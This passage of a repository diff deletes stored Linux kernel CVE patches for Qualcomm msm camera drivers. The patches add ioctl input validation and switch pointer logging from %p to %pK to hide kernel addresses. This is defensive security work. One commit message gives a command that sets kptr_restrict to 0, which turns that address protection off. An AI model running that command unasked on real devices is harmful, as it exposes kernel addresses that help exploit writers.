-and an information disclosure is possible
-CRs-Fixed: 1042068
-
-Change-Id: Iddb291b10cdcb5c42ab8497e06c2ce47885cd5ab
-Signed-off-by: Suman Mukherjee
-Signed-off-by: Sunid Wilson
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 10 +++++++---
- 1 file changed, 7 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index ac0ba8e..964703c 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2495,14 +2495,14 @@ static int msm_cpp_validate_input(unsigned int cmd, void *arg,
- break;
- default:
- if (ioctl_ptr == NULL) {
-- pr_err("Wrong ioctl_ptr %pK\n", ioctl_ptr);
-+ pr_err("Wrong ioctl_ptr for cmd %u\n", cmd);
- return -EINVAL;
- }
-
- *ioctl_ptr = arg;
- if ((*ioctl_ptr == NULL) ||
-- ((*ioctl_ptr)->ioctl_ptr == NULL)) {
-- pr_err("Wrong arg %pK\n", arg);
-+ (*ioctl_ptr)->ioctl_ptr == NULL) {
-+ pr_err("Error invalid ioctl argument cmd %u\n", cmd);
- return -EINVAL;
- }
- break;
-@@ -2542,6 +2542,10 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- pr_err("cpp_dev is null\n");
- return -EINVAL;
- }
-+ if (_IOC_DIR(cmd) == _IOC_NONE) {
-+ pr_err("Invalid ioctl/subdev cmd %u", cmd);
-+ return -EINVAL;
-+ }
- rc = msm_cpp_validate_input(cmd, arg, &ioctl_ptr);
- if (rc != 0) {
- pr_err("input validation failed\n");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6756/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6756/3.18/0002.patch
deleted file mode 100644
index cbaf34cf..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6756/3.18/0002.patch
+++ /dev/null
@@ -1,1593 +0,0 @@ -From 3a214ef870dc97437c7de79a1507dfe5079dce88 Mon Sep 17 00:00:00 2001 -From: Azam Sadiq Pasha Kapatrala Syed -Date: Thu, 10 Mar 2016 15:01:06 -0800 -Subject: msm: camera: Avoid exposing kernel addresses - -Usage of %p exposes the kernel addresses, an easy target to -kernel write vulnerabilities. With this patch currently -%pK prints only Zeros as address. If you need actual address -echo 0 > /proc/sys/kernel/kptr_restrict - -CRs-Fixed: 987011 -Change-Id: I6c79f82376936fc646b723872a96a6694fe47cd9 -Signed-off-by: Azam Sadiq Pasha Kapatrala Syed ---- - .../platform/msm/camera_v2/common/cam_smmu_api.c | 32 ++++++++-------- - .../platform/msm/camera_v2/common/cam_soc_api.c | 26 ++++++------- - .../msm/camera_v2/common/msm_camera_io_util.c | 26 ++++++------- - .../media/platform/msm/camera_v2/fd/msm_fd_hw.c | 2 +- - .../media/platform/msm/camera_v2/isp/msm_buf_mgr.c | 8 ++-- - .../media/platform/msm/camera_v2/isp/msm_isp46.c | 2 +- - .../media/platform/msm/camera_v2/isp/msm_isp47.c | 2 +- - .../platform/msm/camera_v2/isp/msm_isp_axi_util.c | 16 ++++---- - .../msm/camera_v2/isp/msm_isp_stats_util.c | 7 ++-- - .../platform/msm/camera_v2/isp/msm_isp_util.c | 40 ++++++++++---------- - .../media/platform/msm/camera_v2/ispif/msm_ispif.c | 4 +- - .../platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c | 6 +-- - .../msm/camera_v2/jpeg_10/msm_jpeg_platform.c | 2 +- - .../platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c | 2 +- - .../msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c | 2 +- - .../media/platform/msm/camera_v2/msm_vb2/msm_vb2.c | 4 +- - .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 33 +++++++++-------- - .../platform/msm/camera_v2/pproc/vpe/msm_vpe.c | 8 ++-- - .../msm/camera_v2/sensor/actuator/msm_actuator.c | 8 ++-- - .../platform/msm/camera_v2/sensor/cci/msm_cci.c | 14 +++---- - .../platform/msm/camera_v2/sensor/csid/msm_csid.c | 6 +-- - .../msm/camera_v2/sensor/csiphy/msm_csiphy.c | 6 +-- - .../msm/camera_v2/sensor/eeprom/msm_eeprom.c | 6 +-- - 
.../msm/camera_v2/sensor/flash/msm_flash.c | 2 +- - .../msm/camera_v2/sensor/io/msm_camera_dt_util.c | 6 +-- - .../platform/msm/camera_v2/sensor/msm_sensor.c | 18 ++++----- - .../msm/camera_v2/sensor/msm_sensor_driver.c | 43 ++++++++-------------- - .../msm/camera_v2/sensor/msm_sensor_init.c | 12 +++--- - .../platform/msm/camera_v2/sensor/ois/msm_ois.c | 4 +- - 29 files changed, 167 insertions(+), 180 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/common/cam_smmu_api.c b/drivers/media/platform/msm/camera_v2/common/cam_smmu_api.c -index e703791..5d5ceb7 100644 ---- a/drivers/media/platform/msm/camera_v2/common/cam_smmu_api.c -+++ b/drivers/media/platform/msm/camera_v2/common/cam_smmu_api.c -@@ -229,7 +229,7 @@ static void cam_smmu_print_list(int idx) - pr_err("index = %d ", idx); - list_for_each_entry(mapping, - &iommu_cb_set.cb_info[idx].smmu_buf_list, list) { -- pr_err("ion_fd = %d, paddr= 0x%p, len = %u\n", -+ pr_err("ion_fd = %d, paddr= 0x%pK, len = %u\n", - mapping->ion_fd, (void *)mapping->paddr, - (unsigned int)mapping->len); - } -@@ -240,10 +240,10 @@ static void cam_smmu_print_table(void) - int i; - - for (i = 0; i < iommu_cb_set.cb_num; i++) { -- pr_err("i= %d, handle= %d, name_addr=%p\n", i, -+ pr_err("i= %d, handle= %d, name_addr=%pK\n", i, - (int)iommu_cb_set.cb_info[i].handle, - (void *)iommu_cb_set.cb_info[i].name); -- pr_err("dev = %p ", iommu_cb_set.cb_info[i].dev); -+ pr_err("dev = %pK ", iommu_cb_set.cb_info[i].dev); - } - } - -@@ -306,18 +306,18 @@ static void cam_smmu_check_vaddr_in_range(int idx, void *vaddr) - end_addr = (unsigned long)mapping->paddr + mapping->len; - - if (start_addr <= current_addr && current_addr < end_addr) { -- pr_err("Error: va %p is valid: range:%p-%p, fd = %d cb: %s\n", -+ pr_err("Error: va %pK is valid: range:%pK-%pK, fd = %d cb: %s\n", - vaddr, (void *)start_addr, (void *)end_addr, - mapping->ion_fd, - iommu_cb_set.cb_info[idx].name); - return; - } else { -- CDBG("va %p is not in this range: %p-%p, 
fd = %d\n", -+ CDBG("va %pK is not in this range: %pK-%pK, fd = %d\n", - vaddr, (void *)start_addr, (void *)end_addr, - mapping->ion_fd); - } - } -- pr_err("Cannot find vaddr:%p in SMMU. %s uses invalid virtual address\n", -+ pr_err("Cannot find vaddr:%pK in SMMU. %s uses invalid virtual address\n", - vaddr, iommu_cb_set.cb_info[idx].name); - return; - } -@@ -393,7 +393,7 @@ static int cam_smmu_iommu_fault_handler(struct iommu_domain *domain, - - if (!token) { - pr_err("Error: token is NULL\n"); -- pr_err("Error: domain = %p, device = %p\n", domain, dev); -+ pr_err("Error: domain = %pK, device = %pK\n", domain, dev); - pr_err("iova = %lX, flags = %d\n", iova, flags); - return 0; - } -@@ -705,7 +705,7 @@ static void cam_smmu_clean_buffer_list(int idx) - - list_for_each_entry_safe(mapping_info, temp, - &iommu_cb_set.cb_info[idx].smmu_buf_list, list) { -- CDBG("Free mapping address %p, i = %d, fd = %d\n", -+ CDBG("Free mapping address %pK, i = %d, fd = %d\n", - (void *)mapping_info->paddr, idx, - mapping_info->ion_fd); - -@@ -800,11 +800,11 @@ static int cam_smmu_map_buffer_and_add_to_list(int idx, int ion_fd, - } - - if (table->sgl) { -- CDBG("DMA buf: %p, device: %p, attach: %p, table: %p\n", -+ CDBG("DMA buf: %pK, device: %pK, attach: %pK, table: %pK\n", - (void *)buf, - (void *)iommu_cb_set.cb_info[idx].dev, - (void *)attach, (void *)table); -- CDBG("table sgl: %p, rc: %d, dma_address: 0x%x\n", -+ CDBG("table sgl: %pK, rc: %d, dma_address: 0x%x\n", - (void *)table->sgl, rc, - (unsigned int)table->sgl->dma_address); - } else { -@@ -838,7 +838,7 @@ static int cam_smmu_map_buffer_and_add_to_list(int idx, int ion_fd, - rc = -ENOSPC; - goto err_unmap_sg; - } -- CDBG("ion_fd = %d, dev = %p, paddr= %p, len = %u\n", ion_fd, -+ CDBG("ion_fd = %d, dev = %pK, paddr= %pK, len = %u\n", ion_fd, - (void *)iommu_cb_set.cb_info[idx].dev, - (void *)*paddr_ptr, (unsigned int)*len_ptr); - -@@ -862,10 +862,10 @@ static int cam_smmu_unmap_buf_and_remove_from_list( - { - if 
((!mapping_info->buf) || (!mapping_info->table) || - (!mapping_info->attach)) { -- pr_err("Error: Invalid params dev = %p, table = %p", -+ pr_err("Error: Invalid params dev = %pK, table = %pK", - (void *)iommu_cb_set.cb_info[idx].dev, - (void *)mapping_info->table); -- pr_err("Error:dma_buf = %p, attach = %p\n", -+ pr_err("Error:dma_buf = %pK, attach = %pK\n", - (void *)mapping_info->buf, - (void *)mapping_info->attach); - return -EINVAL; -@@ -989,7 +989,7 @@ static int cam_smmu_alloc_scratch_buffer_add_to_list(int idx, - - CDBG("%s: nents = %lu, idx = %d, virt_len = %zx\n", - __func__, nents, idx, virt_len); -- CDBG("%s: phys_len = %zx, iommu_dir = %d, virt_addr = %p\n", -+ CDBG("%s: phys_len = %zx, iommu_dir = %d, virt_addr = %pK\n", - __func__, phys_len, iommu_dir, virt_addr); - - /* This table will go inside the 'mapping' structure -@@ -1055,7 +1055,7 @@ static int cam_smmu_alloc_scratch_buffer_add_to_list(int idx, - mapping_info->ref_count = 1; - mapping_info->phys_len = phys_len; - -- CDBG("%s: paddr = %p, len = %zx, phys_len = %zx", -+ CDBG("%s: paddr = %pK, len = %zx, phys_len = %zx", - __func__, (void *)mapping_info->paddr, - mapping_info->len, mapping_info->phys_len); - -@@ -1093,7 +1093,7 @@ static int cam_smmu_free_scratch_buffer_remove_from_list( - &iommu_cb_set.cb_info[idx].scratch_map; - - if (!mapping_info->table) { -- pr_err("Error: Invalid params: dev = %p, table = %p, ", -+ pr_err("Error: Invalid params: dev = %pK, table = %pK, ", - (void *)iommu_cb_set.cb_info[idx].dev, - (void *)mapping_info->table); - return -EINVAL; -diff --git a/drivers/media/platform/msm/camera_v2/common/cam_soc_api.c b/drivers/media/platform/msm/camera_v2/common/cam_soc_api.c -index 33e1299..21ac680 100644 ---- a/drivers/media/platform/msm/camera_v2/common/cam_soc_api.c -+++ b/drivers/media/platform/msm/camera_v2/common/cam_soc_api.c -@@ -165,7 +165,7 @@ int msm_camera_get_clk_info(struct platform_device *pdev, - rc = PTR_ERR((*clk_ptr)[i]); - goto err4; - } -- CDBG("clk 
ptr[%d] :%p\n", i, (*clk_ptr)[i]); -+ CDBG("clk ptr[%d] :%pK\n", i, (*clk_ptr)[i]); - } - - devm_kfree(&pdev->dev, rates); -@@ -289,7 +289,7 @@ int msm_camera_get_clk_info_and_rates( - rc = PTR_ERR(clks[i]); - goto err5; - } -- CDBG("clk ptr[%d] :%p\n", i, clks[i]); -+ CDBG("clk ptr[%d] :%pK\n", i, clks[i]); - } - *pclk_info = clk_info; - *pclks = clks; -@@ -405,7 +405,7 @@ long msm_camera_clk_set_rate(struct device *dev, - if (!dev || !clk || (clk_rate < 0)) - return -EINVAL; - -- CDBG("clk : %p, enable : %ld\n", clk, clk_rate); -+ CDBG("clk : %pK, enable : %ld\n", clk, clk_rate); - - if (clk_rate > 0) { - rate = clk_round_rate(clk, clk_rate); -@@ -436,7 +436,7 @@ int msm_camera_put_clk_info(struct platform_device *pdev, - if (clk_ptr[i] != NULL) - devm_clk_put(&pdev->dev, (*clk_ptr)[i]); - -- CDBG("clk ptr[%d] :%p\n", i, (*clk_ptr)[i]); -+ CDBG("clk ptr[%d] :%pK\n", i, (*clk_ptr)[i]); - } - devm_kfree(&pdev->dev, *clk_info); - devm_kfree(&pdev->dev, *clk_ptr); -@@ -460,7 +460,7 @@ int msm_camera_put_clk_info_and_rates(struct platform_device *pdev, - for (i = cnt - 1; i >= 0; i--) { - if (clk_ptr[i] != NULL) - devm_clk_put(&pdev->dev, (*clk_ptr)[i]); -- CDBG("clk ptr[%d] :%p\n", i, (*clk_ptr)[i]); -+ CDBG("clk ptr[%d] :%pK\n", i, (*clk_ptr)[i]); - } - devm_kfree(&pdev->dev, *clk_info); - devm_kfree(&pdev->dev, *clk_ptr); -@@ -531,7 +531,7 @@ int msm_camera_get_regulator_info(struct platform_device *pdev, - rc = -EINVAL; - goto err1; - } -- CDBG("vdd ptr[%d] :%p\n", i, tmp_reg[i].vdd); -+ CDBG("vdd ptr[%d] :%pK\n", i, tmp_reg[i].vdd); - } - - *num_reg = cnt; -@@ -607,7 +607,7 @@ void msm_camera_put_regulators(struct platform_device *pdev, - for (i = cnt - 1; i >= 0; i--) { - if (vdd_info[i] && !IS_ERR_OR_NULL(vdd_info[i]->vdd)) - devm_regulator_put(vdd_info[i]->vdd); -- CDBG("vdd ptr[%d] :%p\n", i, vdd_info[i]->vdd); -+ CDBG("vdd ptr[%d] :%pK\n", i, vdd_info[i]->vdd); - } - - devm_kfree(&pdev->dev, *vdd_info); -@@ -646,7 +646,7 @@ int msm_camera_register_irq(struct 
platform_device *pdev, - rc = -EINVAL; - } - -- CDBG("Registered irq for %s[resource - %p]\n", irq_name, irq); -+ CDBG("Registered irq for %s[resource - %pK]\n", irq_name, irq); - - return rc; - } -@@ -671,7 +671,7 @@ int msm_camera_register_threaded_irq(struct platform_device *pdev, - rc = -EINVAL; - } - -- CDBG("Registered irq for %s[resource - %p]\n", irq_name, irq); -+ CDBG("Registered irq for %s[resource - %pK]\n", irq_name, irq); - - return rc; - } -@@ -703,7 +703,7 @@ int msm_camera_unregister_irq(struct platform_device *pdev, - return -EINVAL; - } - -- CDBG("Un Registering irq for [resource - %p]\n", irq); -+ CDBG("Un Registering irq for [resource - %pK]\n", irq); - devm_free_irq(&pdev->dev, irq->start, dev_id); - - return 0; -@@ -730,7 +730,7 @@ void __iomem *msm_camera_get_reg_base(struct platform_device *pdev, - } - - if (reserve_mem) { -- CDBG("device:%p, mem : %p, size : %d\n", -+ CDBG("device:%pK, mem : %pK, size : %d\n", - &pdev->dev, mem, (int)resource_size(mem)); - if (!devm_request_mem_region(&pdev->dev, mem->start, - resource_size(mem), -@@ -749,7 +749,7 @@ void __iomem *msm_camera_get_reg_base(struct platform_device *pdev, - return NULL; - } - -- CDBG("base : %p\n", base); -+ CDBG("base : %pK\n", base); - return base; - } - EXPORT_SYMBOL(msm_camera_get_reg_base); -@@ -793,7 +793,7 @@ int msm_camera_put_reg_base(struct platform_device *pdev, - pr_err("err: mem resource %s not found\n", device_name); - return -EINVAL; - } -- CDBG("mem : %p, size : %d\n", mem, (int)resource_size(mem)); -+ CDBG("mem : %pK, size : %d\n", mem, (int)resource_size(mem)); - - devm_iounmap(&pdev->dev, base); - if (reserve_mem) -diff --git a/drivers/media/platform/msm/camera_v2/common/msm_camera_io_util.c b/drivers/media/platform/msm/camera_v2/common/msm_camera_io_util.c -index f978f97..51a9ea8 100644 ---- a/drivers/media/platform/msm/camera_v2/common/msm_camera_io_util.c -+++ b/drivers/media/platform/msm/camera_v2/common/msm_camera_io_util.c -@@ -27,7 +27,7 @@ - - void 
msm_camera_io_w(u32 data, void __iomem *addr) - { -- CDBG("%s: 0x%p %08x\n", __func__, (addr), (data)); -+ CDBG("%s: 0x%pK %08x\n", __func__, (addr), (data)); - writel_relaxed((data), (addr)); - } - -@@ -43,7 +43,7 @@ int32_t msm_camera_io_w_block(const u32 *addr, void __iomem *base, - return -EINVAL; - - for (i = 0; i < len; i++) { -- CDBG("%s: len =%d val=%x base =%p\n", __func__, -+ CDBG("%s: len =%d val=%x base =%pK\n", __func__, - len, addr[i], base); - writel_relaxed(addr[i], base); - } -@@ -62,7 +62,7 @@ int32_t msm_camera_io_w_reg_block(const u32 *addr, void __iomem *base, - return -EINVAL; - - for (i = 0; i < len; i = i + 2) { -- CDBG("%s: len =%d val=%x base =%p reg=%x\n", __func__, -+ CDBG("%s: len =%d val=%x base =%pK reg=%x\n", __func__, - len, addr[i + 1], base, addr[i]); - writel_relaxed(addr[i + 1], base + addr[i]); - } -@@ -71,7 +71,7 @@ int32_t msm_camera_io_w_reg_block(const u32 *addr, void __iomem *base, - - void msm_camera_io_w_mb(u32 data, void __iomem *addr) - { -- CDBG("%s: 0x%p %08x\n", __func__, (addr), (data)); -+ CDBG("%s: 0x%pK %08x\n", __func__, (addr), (data)); - /* ensure write is done */ - wmb(); - writel_relaxed((data), (addr)); -@@ -89,7 +89,7 @@ int32_t msm_camera_io_w_mb_block(const u32 *addr, void __iomem *base, u32 len) - for (i = 0; i < len; i++) { - /* ensure write is done */ - wmb(); -- CDBG("%s: len =%d val=%x base =%p\n", __func__, -+ CDBG("%s: len =%d val=%x base =%pK\n", __func__, - len, addr[i], base); - writel_relaxed(addr[i], base); - } -@@ -102,7 +102,7 @@ u32 msm_camera_io_r(void __iomem *addr) - { - uint32_t data = readl_relaxed(addr); - -- CDBG("%s: 0x%p %08x\n", __func__, (addr), (data)); -+ CDBG("%s: 0x%pK %08x\n", __func__, (addr), (data)); - return data; - } - -@@ -114,7 +114,7 @@ u32 msm_camera_io_r_mb(void __iomem *addr) - data = readl_relaxed(addr); - /* ensure read is done */ - rmb(); -- CDBG("%s: 0x%p %08x\n", __func__, (addr), (data)); -+ CDBG("%s: 0x%pK %08x\n", __func__, (addr), (data)); - return 
data; - } - -@@ -180,7 +180,7 @@ void msm_camera_io_dump(void __iomem *addr, int size, int enable) - u32 *p = (u32 *) addr; - u32 data; - -- CDBG("%s: addr=%p size=%d\n", __func__, addr, size); -+ CDBG("%s: addr=%pK size=%d\n", __func__, addr, size); - - if (!p || (size <= 0) || !enable) - return; -@@ -216,12 +216,12 @@ void msm_camera_io_dump_wstring_base(void __iomem *addr, - { - int i, u = sizeof(struct msm_cam_dump_string_info); - -- pr_debug("%s: addr=%p data=%p size=%d u=%d, cnt=%d\n", __func__, -+ pr_debug("%s: addr=%pK data=%pK size=%d u=%d, cnt=%d\n", __func__, - addr, dump_data, size, u, - (size/u)); - - if (!addr || (size <= 0) || !dump_data) { -- pr_err("%s: addr=%p data=%p size=%d\n", __func__, -+ pr_err("%s: addr=%pK data=%pK size=%d\n", __func__, - addr, dump_data, size); - return; - } -@@ -233,7 +233,7 @@ void msm_camera_io_dump_wstring_base(void __iomem *addr, - void msm_camera_io_memcpy(void __iomem *dest_addr, - void __iomem *src_addr, u32 len) - { -- CDBG("%s: %p %p %d\n", __func__, dest_addr, src_addr, len); -+ CDBG("%s: %pK %pK %d\n", __func__, dest_addr, src_addr, len); - msm_camera_io_memcpy_toio(dest_addr, src_addr, len / 4); - } - -@@ -728,7 +728,7 @@ int msm_camera_request_gpio_table(struct gpio *gpio_tbl, uint8_t size, - int rc = 0, i = 0, err = 0; - - if (!gpio_tbl || !size) { -- pr_err("%s:%d invalid gpio_tbl %p / size %d\n", __func__, -+ pr_err("%s:%d invalid gpio_tbl %pK / size %d\n", __func__, - __LINE__, gpio_tbl, size); - return -EINVAL; - } -@@ -772,7 +772,7 @@ int msm_camera_get_dt_reg_settings(struct device_node *of_node, - unsigned int cnt; - - if (!of_node || !dt_prop_name || !size || !reg_s) { -- pr_err("%s: Error invalid args %p:%p:%p:%p\n", -+ pr_err("%s: Error invalid args %pK:%pK:%pK:%pK\n", - __func__, size, reg_s, of_node, dt_prop_name); - return -EINVAL; - } -diff --git a/drivers/media/platform/msm/camera_v2/fd/msm_fd_hw.c b/drivers/media/platform/msm/camera_v2/fd/msm_fd_hw.c -index 680bdf5..a20f40a0 100644 ---- 
a/drivers/media/platform/msm/camera_v2/fd/msm_fd_hw.c -+++ b/drivers/media/platform/msm/camera_v2/fd/msm_fd_hw.c -@@ -669,7 +669,7 @@ int32_t msm_fd_hw_set_dt_parms_by_name(struct msm_fd_device *fd, - dt_reg_settings[i + MSM_FD_REG_ADDR_OFFSET_IDX], - dt_reg_settings[i + MSM_FD_REG_VALUE_IDX] & - dt_reg_settings[i + MSM_FD_REG_MASK_IDX]); -- pr_debug("%s:%d] %p %08x\n", __func__, __LINE__, -+ pr_debug("%s:%d] %pK %08x\n", __func__, __LINE__, - fd->iomem_base[base_idx] + - dt_reg_settings[i + MSM_FD_REG_ADDR_OFFSET_IDX], - dt_reg_settings[i + MSM_FD_REG_VALUE_IDX] & -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c -index 3331f0d..94e9745 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c -@@ -62,13 +62,13 @@ static int msm_buf_check_head_sanity(struct msm_isp_bufq *bufq) - } - - if (prev->next != &bufq->head) { -- pr_err("%s: Error! head prev->next is %p should be %p\n", -+ pr_err("%s: Error! head prev->next is %pK should be %pK\n", - __func__, prev->next, &bufq->head); - return -EINVAL; - } - - if (next->prev != &bufq->head) { -- pr_err("%s: Error! head next->prev is %p should be %p\n", -+ pr_err("%s: Error! 
head next->prev is %pK should be %pK\n", - __func__, next->prev, &bufq->head); - return -EINVAL; - } -@@ -228,7 +228,7 @@ static void msm_isp_unprepare_v4l2_buf( - struct msm_isp_bufq *bufq = NULL; - - if (!buf_mgr || !buf_info) { -- pr_err("%s: NULL ptr %p %p\n", __func__, -+ pr_err("%s: NULL ptr %pK %pK\n", __func__, - buf_mgr, buf_info); - return; - } -@@ -255,7 +255,7 @@ static int msm_isp_map_buf(struct msm_isp_buf_mgr *buf_mgr, - int ret; - - if (!buf_mgr || !mapped_info) { -- pr_err_ratelimited("%s: %d] NULL ptr buf_mgr %p mapped_info %p\n", -+ pr_err_ratelimited("%s: %d] NULL ptr buf_mgr %pK mapped_info %pK\n", - __func__, __LINE__, buf_mgr, mapped_info); - return -EINVAL; - } -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp46.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp46.c -index e1e579b..f15f234 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp46.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp46.c -@@ -920,7 +920,7 @@ static int msm_vfe46_start_fetch_engine(struct vfe_device *vfe_dev, - rc = vfe_dev->buf_mgr->ops->get_buf_by_index( - vfe_dev->buf_mgr, bufq_handle, fe_cfg->buf_idx, &buf); - if (rc < 0 || !buf) { -- pr_err("%s: No fetch buffer rc= %d buf= %p\n", -+ pr_err("%s: No fetch buffer rc= %d buf= %pK\n", - __func__, rc, buf); - return -EINVAL; - } -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp47.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp47.c -index 603e83a..ebf38dd 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp47.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp47.c -@@ -1058,7 +1058,7 @@ static int msm_vfe47_start_fetch_engine(struct vfe_device *vfe_dev, - rc = vfe_dev->buf_mgr->ops->get_buf_by_index( - vfe_dev->buf_mgr, bufq_handle, fe_cfg->buf_idx, &buf); - if (rc < 0 || !buf) { -- pr_err("%s: No fetch buffer rc= %d buf= %p\n", -+ pr_err("%s: No fetch buffer rc= %d buf= %pK\n", - __func__, rc, buf); - return -EINVAL; - } -diff --git 
a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index fbda545..a5952a5 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -725,7 +725,7 @@ void msm_isp_check_for_output_error(struct vfe_device *vfe_dev,
- int i;
-
- if (!vfe_dev || !sof_info) {
-- pr_err("%s %d failed: vfe_dev %p sof_info %p\n", __func__,
-+ pr_err("%s %d failed: vfe_dev %pK sof_info %pK\n", __func__,
- __LINE__, vfe_dev, sof_info);
- return;
- }
-@@ -1284,7 +1284,7 @@ static int msm_isp_axi_stream_enable_cfg(
- !dual_vfe_res->axi_data[ISP_VFE0] ||
- !dual_vfe_res->vfe_base[ISP_VFE1] ||
- !dual_vfe_res->axi_data[ISP_VFE1]) {
-- pr_err("%s:%d failed vfe0 %p %p vfe %p %p\n",
-+ pr_err("%s:%d failed vfe0 %pK %pK vfe %pK %pK\n",
- __func__, __LINE__,
- dual_vfe_res->vfe_base[ISP_VFE0],
- dual_vfe_res->axi_data[ISP_VFE0],
-@@ -1659,7 +1659,7 @@ static int msm_isp_cfg_ping_pong_address(struct vfe_device *vfe_dev,
- !dual_vfe_res->axi_data[ISP_VFE0] ||
- !dual_vfe_res->vfe_base[ISP_VFE1] ||
- !dual_vfe_res->axi_data[ISP_VFE1]) {
-- pr_err("%s:%d failed vfe0 %p %p vfe %p %p\n",
-+ pr_err("%s:%d failed vfe0 %pK %pK vfe %pK %pK\n",
- __func__, __LINE__,
- dual_vfe_res->vfe_base[ISP_VFE0],
- dual_vfe_res->axi_data[ISP_VFE0],
-@@ -1940,7 +1940,7 @@ int msm_isp_drop_frame(struct vfe_device *vfe_dev,
- uint32_t pingpong_bit;
-
- if (!vfe_dev || !stream_info || !ts || !sof_info) {
-- pr_err("%s %d vfe_dev %p stream_info %p ts %p op_info %p\n",
-+ pr_err("%s %d vfe_dev %pK stream_info %pK ts %pK op_info %pK\n",
- __func__, __LINE__, vfe_dev, stream_info, ts,
- sof_info);
- return -EINVAL;
-@@ -2230,7 +2230,7 @@ int msm_isp_axi_reset(struct vfe_device *vfe_dev,
- unsigned long flags;
-
- if (!reset_cmd) {
-- pr_err("%s: NULL pointer reset cmd %p\n", __func__, reset_cmd);
-+ pr_err("%s: NULL pointer reset cmd %pK\n", __func__, reset_cmd);
- rc = 
-1;
- return rc;
- }
-@@ -2928,7 +2928,7 @@ static int msm_isp_return_empty_buffer(struct vfe_device *vfe_dev,
- struct msm_isp_timestamp timestamp;
-
- if (!vfe_dev || !stream_info) {
-- pr_err("%s %d failed: vfe_dev %p stream_info %p\n", __func__,
-+ pr_err("%s %d failed: vfe_dev %pK stream_info %pK\n", __func__,
- __LINE__, vfe_dev, stream_info);
- return -EINVAL;
- }
-@@ -3007,7 +3007,7 @@ static int msm_isp_request_frame(struct vfe_device *vfe_dev,
- bool dual_vfe = false;
-
- if (!vfe_dev || !stream_info) {
-- pr_err("%s %d failed: vfe_dev %p stream_info %p\n", __func__,
-+ pr_err("%s %d failed: vfe_dev %pK stream_info %pK\n", __func__,
- __LINE__, vfe_dev, stream_info);
- return -EINVAL;
- }
-@@ -3659,7 +3659,7 @@ void msm_isp_axi_disable_all_wm(struct vfe_device *vfe_dev)
- int i, j;
-
- if (!vfe_dev || !axi_data) {
-- pr_err("%s: error %p %p\n", __func__, vfe_dev, axi_data);
-+ pr_err("%s: error %pK %pK\n", __func__, vfe_dev, axi_data);
- return;
- }
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index 7eaffad..03c587e 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -88,8 +88,9 @@ static int msm_isp_stats_cfg_ping_pong_address(struct vfe_device *vfe_dev,
- !dual_vfe_res->stats_data[ISP_VFE0] ||
- !dual_vfe_res->vfe_base[ISP_VFE1] ||
- !dual_vfe_res->stats_data[ISP_VFE1]) {
-- pr_err("%s:%d error vfe0 %p %p vfe1 %p %p\n", __func__,
-- __LINE__, dual_vfe_res->vfe_base[ISP_VFE0],
-+ pr_err("%s:%d error vfe0 %pK %pK vfe1 %pK %pK\n",
-+ __func__, __LINE__,
-+ dual_vfe_res->vfe_base[ISP_VFE0],
- dual_vfe_res->stats_data[ISP_VFE0],
- dual_vfe_res->vfe_base[ISP_VFE1],
- dual_vfe_res->stats_data[ISP_VFE1]);
-@@ -156,7 +157,7 @@ static int32_t msm_isp_stats_buf_divert(struct vfe_device *vfe_dev,
- uint32_t stats_idx;
-
- if (!vfe_dev || !ts || !buf_event || !stream_info) { 
-- pr_err("%s:%d failed: invalid params %p %p %p %p\n",
-+ pr_err("%s:%d failed: invalid params %pK %pK %pK %pK\n",
- __func__, __LINE__, vfe_dev, ts, buf_event,
- stream_info);
- return -EINVAL;
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 5f1b208..dc209d7 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -468,14 +468,14 @@ static int msm_isp_get_max_clk_rate(struct vfe_device *vfe_dev, long *rate)
- long round_rate = 0;
-
- if (!vfe_dev || !rate) {
-- pr_err("%s:%d failed: vfe_dev %p rate %p\n", __func__, __LINE__,
-- vfe_dev, rate);
-+ pr_err("%s:%d failed: vfe_dev %pK rate %pK\n", __func__,
-+ __LINE__, vfe_dev, rate);
- return -EINVAL;
- }
-
- *rate = 0;
- if (!vfe_dev->hw_info) {
-- pr_err("%s:%d failed: vfe_dev->hw_info %p\n", __func__,
